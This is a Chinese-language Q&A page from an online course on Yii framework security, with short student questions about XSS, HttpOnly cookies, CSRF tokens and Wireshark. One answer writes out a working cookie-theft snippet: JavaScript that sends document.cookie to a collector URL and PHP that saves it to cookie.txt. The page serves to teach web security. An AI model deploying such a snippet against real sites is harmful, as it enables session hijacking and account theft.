Yii框架不得不说的故事—安全篇（3）_技术问答

首页免费课 Yii框架不得不说的故事—安全篇（3）问答

Yii框架不得不说的故事—安全篇（3）

全部评论问答未解决精华

cookie

最新回答 / 慕神7058616

如果cookie中设置了HttpOnly属性，那么通过js脚本将无法读取到cookie信息,httponly只有这几个功能，不会影响其他操作

1 回答 1003 浏览 2-6 xss攻击之httponly

2018-01-25

如何在网站中输入恶意cookie

最新回答 / 慕仔9151431

注意运算逻辑，循环每次数组长度会有所变化的iiwih

2 回答 1196 浏览 2-3 xss攻击之获取cookie

2017-11-17

你好，6-2中的Wireshark 具体需要怎么配置呢？

最新回答 / kampfdong

目前找到一种行之有效的折中方案，利用工具抓包本地回路，再用wireshark分析。<...图片...>

1 回答 1196 浏览

2017-10-11

浏览器禁用cookie，csrfToken就需要后端自己处理了。

最赞回答 / 慕斯卡4780385

一般正常用户谁没事去禁用cookie 有心得人禁用了服务器不让提交正好合适

1 回答 2712 浏览 5-5 csrf攻击之yii验证过程

2017-04-21

请问防csrf时，yii生成的token有时效性吗？

最新回答 / 锋君

因为你拿到這个页面的数据，是通过后台一系列验证的，

2 回答 3033 浏览 5-5 csrf攻击之yii验证过程

2017-03-03

wordpress中在文章进行xss攻击但是不能弹窗？

最新回答 / 慕婉清1471766

可能是你使用的浏览器自动拦截了弹窗，你换个浏览器试试

2 回答 2039 浏览 2-1 xss攻击介绍

2017-03-02

cookie.txt是怎么生成的？

最赞回答 / 北城慕容雪

js里面：var cookie = document.cookie;window.location.href='http://127.0.0.1/index.php?cookie='+cookie;index.php文件里面：<?phpfile_put_contents('cookie.txt', $_GET['cookie']);

3 回答 2983 浏览 2-5 xss攻击之寻找登陆cookie

2017-02-17